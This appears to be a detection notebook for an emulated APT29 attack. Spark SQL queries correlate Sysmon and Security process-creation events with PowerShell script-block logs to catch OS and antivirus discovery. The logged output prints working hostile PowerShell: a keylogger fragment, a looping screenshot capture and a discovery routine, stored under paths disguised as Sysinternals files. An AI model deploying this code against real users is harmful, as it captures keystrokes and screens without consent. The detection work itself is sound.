                    $RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000
                    $LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000
                    $RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000
                    $TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000
                    $SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000
                    $DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000
                    $EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000
                    $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000
                    $LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000
                    $RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000
                    $UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000
                    $DownArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000
                    $LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000
                    $RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000

                    if ($LeftShift -or $RightShift) {$Outout += '[Shift]'}
                    if ($LeftCtrl  -or $RightCtrl)  {$Outout += '[Ctrl]'}
                    if ($LeftAlt   -or $RightAlt)   {$Outout += '[Alt]'}
                    if ($TabKey)       {$Outout += '[Tab]'}
                    if ($SpaceBar)     {$Outout += '[SpaceBar]'}
                    if ($DeleteKey)    {$Outout += '[Delete]'}
                    if ($EnterKey)     {$Outout += '[Enter]'}
                    if ($BackSpaceKey) {$Outout += '[Backspace]'}
                    if ($LeftArrow)    {$Outout += '[Left Arrow]'}
                    if ($RightArrow)   {$Outout += '[Right Arrow]'}
                    if ($UpArrow)      {$Outout += '[Up Arrow]'}
                    if ($DownArrow)    {$Outout += '[Down Arrow]'}
                    if ($LeftMouse)    {$Outout += '[Left Mouse]'}
                    if ($RightMouse)   {$Outout += '[Right Mouse]'}

                    #check for capslock
                    if ([Console]::CapsLock) {$Outout += '[Caps Lock]'}

                    $scancode = $ImportDll::MapVirtualKey($vkey, 0x3)
                    
                    $kbstate = New-Object Byte[] 256
                    $checkkbstate = $ImportDll::GetKeyboardState($kbstate)
                    
                    $mychar = New-Object -TypeName "System.Text.StringBuilder";
                    $unicode_res = $ImportDll::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)

                    #get the title of the foreground window
                    $TopWindow = $ImportDll::GetForegroundWindow()
                    $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
                    
                    if ($unicode_res -gt 0) {
                        if ($WindowTitle -ne $LastWindowTitle){
                            # if the window has changed
                            $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
                            $Outout = "`n`n$WindowTitle - $TimeStamp`n"
                            $LastWindowTitle = $WindowTitle
                        }
                        $Outout += $mychar.ToString()
                        $Outout
                    }
                }
            }
        }
    }
}

ScriptBlock ID: fa9f2b3a-3f5e-4d3c-93c9-7172cc073add
Path: C:\Program Files\SysinternalsSuite\psversion.ps1 
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-ScreenCapture
# https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/
{
    Start-Job -Name "Screenshot" -ScriptBlock { 
        Write-Host "`nJobPID`n------`n$PID"
        while($true){
            $RandomFileName = [System.IO.Path]::GetRandomFileName(); 
            $Filepath="$env:USERPROFILE\Downloads\$RandomFileName.bmp"; 
            Add-Type -AssemblyName System.Windows.Forms; 
            Add-type -AssemblyName System.Drawing; 
            $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; 
            $Width = $Screen.Width; 
            $Height = $Screen.Height; 
            $Left = $Screen.Left; 
            $Top = $Screen.Top; 
            $bitmap = New-Object System.Drawing.Bitmap $Width, $Height; 
            $graphic = [System.Drawing.Graphics]::FromImage($bitmap); 
            $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size); 
            $bitmap.Save($Filepath); 
            Start-Sleep -Seconds 300
        } 
    }
}

ScriptBlock ID: b91c2ae7-3a03-49df-8d2a-4c42fc79df56
Path: C:\Program Files\SysinternalsSuite\psversion.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    
-RECORD 2-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      

4.C.6. System Information Discovery

Procedure: Enumerated the OS version using PowerShell

Criteria: powershell.exe executing Gwmi Win32_OperatingSystem

Detection Type: Telemetry (Correlated)

Query ID: 5A2B7006-A887-465F-9D41-AED8F6AECBE1

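# 4.C.6 (System Information Discovery), Sysmon-based correlation.
#
# Returns the PowerShell script-block text (EventID 4104) that contains
# "gwmi win32_operatingsystem", but only when the PowerShell process that ran
# it descends from the process chain the query pins down with Sysmon
# process-creation events (EventID 1):
#   b: control.exe whose parent is sdclt.exe
#   c: a child of b running at IntegrityLevel "High"
#   e: a powershell.exe child of c
#   f: 4104 events whose ExecutionProcessID is that powershell.exe's ProcessId
#
# `spark` (the SparkSession) and the `apt29Host` view are notebook globals
# created in an earlier cell; `df` is the resulting DataFrame.
#
# Fix vs. the original query: the powershell.exe match now goes through
# LOWER() like the control.exe / sdclt.exe matches above it. Spark's LIKE is
# case-sensitive, so without it an image path spelled "PowerShell.exe" would
# silently drop the whole correlation.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND LOWER(d.Image) LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%gwmi win32_operatingsystem%"

'''
)
# Vertical, untruncated output so the full script-block text is readable.
df.show(100, truncate=False, vertical=True)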
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID: 69A3B3AC-42BE-44F6-A418-C2356894F745

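# 4.C.6 (System Information Discovery), Security-log-based correlation.
#
# Same detection as the Sysmon variant, but the process chain is built from
# Security EventID 4688 (process creation) records instead:
#   b: control.exe whose parent is sdclt.exe
#   c: a child of b whose MandatoryLabel is S-1-16-12288 (High integrity)
#      and whose TokenElevationType is %%1937 (full elevation token)
#   e: a powershell.exe child of c
#   f: PowerShell 4104 script-block events for that powershell.exe
#
# PID correlation: 4688 reports NewProcessId as a "0x..."-prefixed hex string,
# while the 4104 event's ExecutionProcessID is a decimal integer. The query
# therefore strips the "0x" prefix on one side and applies LOWER(hex(...)) on
# the other so the two compare as the same lowercase hex text.
#
# `spark` and the `apt29Host` view are notebook globals created earlier.
#
# Fix vs. the original query: the powershell.exe match now goes through
# LOWER(), consistent with the other NewProcessName / ParentProcessName
# matches in this query; Spark's LIKE is case-sensitive.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND LOWER(d.NewProcessName) LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%gwmi win32_operatingsystem%"

'''
)
# Vertical, untruncated output so the full script-block text is readable.
df.show(100, truncate=False, vertical=True)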
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.7. Security Software Discovery

Procedure: Enumerated anti-virus software using PowerShell

Criteria: powershell.exe executing Get-WmiObject … -Class AntiVirusProduct

Detection Type: Telemetry (Correlated)

Query ID:E1E0849D-1771-438B-9D8F-A67B7EC48B97

# 4.C.7 Security Software Discovery, Sysmon correlation
# (Query ID E1E0849D-1771-438B-9D8F-A67B7EC48B97).
#
# The inner joins walk the process tree recorded by Sysmon EventID 1:
#   b: control.exe whose parent is sdclt.exe
#   c: a child of b running at IntegrityLevel "High"
#   d: a powershell.exe child of c
# The outer query then returns the PowerShell 4104 script-block Message whose
# text contains "-class antivirusproduct", joined on f.ExecutionProcessID = d.ProcessId.
#
# Coverage caveat: the chain is anchored on the sdclt.exe -> control.exe parent
# relationship, so the same discovery activity launched from a different
# process lineage would not be returned by this query.
# NOTE(review): d.Image is matched with LIKE but no LOWER(), unlike the
# Image/ParentImage filters in subquery b; LIKE is case-sensitive in Spark SQL,
# so a differently cased image path would be missed.
# `spark` is not defined in this file; it is assumed to be the notebook's SparkSession.
antivirus_discovery_sysmon_sql = '''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%-class antivirusproduct%"

'''
df = spark.sql(antivirus_discovery_sysmon_sql)
# Vertical layout keeps the multi-line script block readable; truncate=False
# shows the whole Message.
df.show(100, truncate=False, vertical=True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:956D78C8-FCB5-440D-B059-6790F729D02D

# 4.C.7 Security Software Discovery, Windows Security (4688) correlation
# (Query ID 956D78C8-FCB5-440D-B059-6790F729D02D).
#
# Same process-tree walk as the Sysmon variant, built from Security EventID 4688:
#   b: control.exe created by sdclt.exe
#   a: a process created by b (a.ProcessId = b.NewProcessId) with
#      MandatoryLabel S-1-16-12288 (High) and TokenElevationType %%1937 (full token)
#   d: a powershell.exe created by a
# 4688 stores NewProcessId as a "0x…" hex string while 4104 ExecutionProcessID is
# numeric, so the join normalizes both sides: split(..., '0x')[1] on the 4688 side,
# LOWER(hex(...)) on the 4104 side.
#
# Coverage caveat: anchored on the sdclt.exe -> control.exe lineage, so this
# specific chain is required for a match.
# NOTE(review): d.NewProcessName is matched without LOWER(), unlike the
# NewProcessName/ParentProcessName filters in subquery b; LIKE is case-sensitive.
# `spark` is not defined in this file; it is assumed to be the notebook's SparkSession.
antivirus_discovery_security_sql = '''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%-class antivirusproduct%"

'''
df = spark.sql(antivirus_discovery_security_sql)
# Vertical layout keeps the multi-line script block readable; truncate=False
# shows the whole Message.
df.show(100, truncate=False, vertical=True)
